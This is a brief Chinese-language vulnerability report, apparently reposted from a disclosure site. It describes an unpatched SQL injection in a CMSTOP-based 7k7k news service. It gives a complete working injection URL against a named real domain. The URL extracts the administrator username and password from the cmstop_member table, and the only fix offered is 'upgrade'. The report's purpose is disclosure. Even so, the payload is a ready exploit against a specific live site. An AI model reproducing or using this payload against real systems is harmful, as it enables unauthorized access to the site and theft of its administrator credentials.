7k7k某业务存在SQL注射漏洞(暴露管理员密码与后台地址)某个业务采用 cmstop 建站系统, 但是 app那个 地方 漏洞 未修复
比较奇葩的就是 有时候 可以 测试出来漏洞 与时候 却又 不可以 , 难道因为 CDN 的问题? 漏洞的 测试成功与否 只能看人品了。。。
http://api.news.7k7k.com/?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20concat(username,char(0x3d),password)%20from%20cmstop_member%20where%20userid=1;%23
http://api.news.7k7k.com/?app=vote&controller=vote&action=total&contentid=1 存在注入的地方
这貌似是 管理员啊,, 再来 第二张
修复方案:
升级吧 。。。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;